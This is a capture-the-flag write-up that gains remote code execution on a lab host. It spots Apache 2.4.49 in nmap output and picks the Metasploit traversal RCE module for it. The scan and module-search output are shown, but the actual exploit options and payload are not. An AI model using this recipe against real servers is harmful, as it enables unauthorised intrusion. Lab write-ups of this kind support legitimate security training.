Description
Obtain RCE on the host calculator.edu.stf (10.124.1.232) by exploiting a business logic vulnerability.
To get the flag, run the script /home/rceflag.
<aside> 💡
Again, this might be another UNINTENDED solution, but we still achieved the RCE and obtained the flag. The challenge hints at business logic vulnerabilities, but I discovered other critical vulnerabilities during our early reconnaissance and proceeded with those instead.
</aside>
As usual, the first thing I always do is scan our targets using nmap
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 6c:ae:40:fe:62:06:3e:08:f4:96:f1:7d:22:63:ac:dd (RSA)
| 256 8a:be:5e:69:a5:62:26:4b:60:cb:45:c4:bd:7a:47:c5 (ECDSA)
|_ 256 93:50:2d:84:88:cc:50:99:6d:be:c0:05:50:08:c2:eb (ED25519)
80/tcp open http Apache httpd 2.4.49 ((Unix))
|_http-server-header: Apache/2.4.49 (Unix)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Apache2 Debian Default Page: It works
8080/tcp open http Golang net/http server
| fingerprint-strings:
| GetRequest:
| HTTP/1.0 200 OK
| Accept-Ranges: bytes
| Content-Length: 619
| Content-Type: text/html; charset=utf-8
| Last-Modified: Mon, 19 Feb 2024 10:24:56 GMT
| Date: Sun, 07 Sep 2025 17:15:45 GMT
| <!DOCTYPE html>
| <html>
| <head>
| <meta charset="UTF-8" />
| </head>
| <body>
| <div>
| <p>Request for nuclear power plant capacity for legal entities</p>
| <form method="POST" action="/">
| <label for="temp">Specify the required amount of MegaWatts</label>
| <input name="temp" type="number" min="0" max="100" id="temp"/>
| <input type="submit" value="Test">
| </form>
| </div>
| </body>
| </html>
| HTTPOptions:
| HTTP/1.0 200 OK
| Date: Sun, 07 Sep 2025 17:15:45 GMT
| Content-Length: 40
| Content-Type: text/plain; charset=utf-8
| Only GET and POST methods are supported.
| RTSPRequest:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
|_ Request
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at <https://nmap.org/cgi-bin/submit.cgi?new-service> :
SF-Port8080-TCP:V=7.95%I=7%D=9/7%Time=68BDBDC0%P=x86_64-pc-linux-gnu%r(Get
SF:Request,324,"HTTP/1\\.0\\x20200\\x20OK\\r\\nAccept-Ranges:\\x20bytes\\r\\nConte
SF:nt-Length:\\x20619\\r\\nContent-Type:\\x20text/html;\\x20charset=utf-8\\r\\nLa
SF:st-Modified:\\x20Mon,\\x2019\\x20Feb\\x202024\\x2010:24:56\\x20GMT\\r\\nDate:\\x
SF:20Sun,\\x2007\\x20Sep\\x202025\\x2017:15:45\\x20GMT\\r\\n\\r\\n<!DOCTYPE\\x20html
SF:>\\n<html>\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20<head>\\n\\x20\\x20\\x20\\x20\\x20
SF:\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20<meta\\x20charset=\\"UTF-8\\"\\
SF:x20/>\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20</head>\\n\\x20\\x20\\x20\\x20\\x20\\x2
SF:0\\x20\\x20<body>\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x
SF:20\\x20\\x20<div>\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x
SF:20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20<p>Request\\x20for\\x20nuclear\\
SF:x20power\\x20plant\\x20capacity\\x20for\\x20legal\\x20entities</p>\\n\\x20\\x20
SF:\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x2
SF:0\\x20\\x20\\x20\\x20<form\\x20method=\\"POST\\"\\x20action=\\"/\\">\\n\\x20\\x20\\x2
SF:0\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x
SF:20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20<label\\x20for=\\"temp\\">Sp
SF:ecify\\x20the\\x20required\\x20amount\\x20of\\x20MegaWatts</label>\\n\\x20\\x20
SF:\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x2
SF:0\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20<input\\x20name=\\"temp\\
SF:"\\x20type=\\"number\\"\\x20min=\\"0\\"\\x20max=\\"100\\"\\x20id=\\"temp\\"/>\\n\\x20
SF:\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x2
SF:0\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20<input\\x20type=\\"s
SF:ubmit\\"\\x20value=\\"Test\\">\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x2
SF:0\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20</form>\\n\\x20\\x20\\
SF:x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20</div>\\n\\x20\\x20
SF:\\x20\\x20\\x20\\x20\\x20\\x20</body>\\n</html>\\n")%r(HTTPOptions,9D,"HTTP/1\\.
SF:0\\x20200\\x20OK\\r\\nDate:\\x20Sun,\\x2007\\x20Sep\\x202025\\x2017:15:45\\x20GMT
SF:\\r\\nContent-Length:\\x2040\\r\\nContent-Type:\\x20text/plain;\\x20charset=ut
SF:f-8\\r\\n\\r\\nOnly\\x20GET\\x20and\\x20POST\\x20methods\\x20are\\x20supported\\."
SF:)%r(RTSPRequest,67,"HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:
SF:\\x20text/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20
SF:Bad\\x20Request");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 42.94 seconds
And surprisingly! from the output, we can already noticed a critical vulnerability related to Apache httpd 2.4.49 ((Unix))
checkout:
Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE)
Without wasting time, I just searched for the exploit module in Metasploit
┌──(kali㉿kali)-[~/Desktop]
└─$ sudo msfconsole
Metasploit tip: Use the 'capture' plugin to start multiple
authentication-capturing and poisoning services
___ ____
,-"" `. < HONK >
,' _ e )`-._ / ----
/ ,' `-._<.===-'
/ /
/ ;
_ / ;
(`._ _.-"" ""--..__,' |
<_ `-"" \\
<`- :
(__ <__. ;
`-. '-.__. _.' /
\\ `-.__,-' _,'
`._ , /__,-'
""._\\__,'< <____
| | `----.`.
| | \\ `.
; |___ \\-``
\\ --<
`.`.<
`-'
=[ metasploit v6.4.84-dev ]
+ -- --=[ 2,547 exploits - 1,309 auxiliary - 1,683 payloads ]
+ -- --=[ 432 post - 49 encoders - 13 nops - 9 evasion ]
Metasploit Documentation: <https://docs.metasploit.com/>
The Metasploit Framework is a Rapid7 Open Source Project
msf > search Apache httpd 2.4.49
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/apache_normalize_path_rce 2021-05-10 excellent Yes Apache 2.4.49/2.4.50 Traversal RCE
1 \\_ target: Automatic (Dropper) . . . .
2 \\_ target: Unix Command (In-Memory) . . . .
3 auxiliary/scanner/http/apache_normalize_path 2021-05-10 normal No Apache 2.4.49/2.4.50 Traversal RCE scanner
4 \\_ action: CHECK_RCE . . . Check for RCE (if mod_cgi is enabled).
5 \\_ action: CHECK_TRAVERSAL . . . Check for vulnerability.
6 \\_ action: READ_FILE . . . Read file on the remote server.
Interact with a module by name or index. For example info 6, use 6 or use auxiliary/scanner/http/apache_normalize_path
After interacting with a module you can manually set a ACTION with set ACTION 'READ_FILE'
And yes, the exploit is available in Metasploit.
Set the exploit options and we instantly popped the shell.. Run /home/rceflag and we get the flag..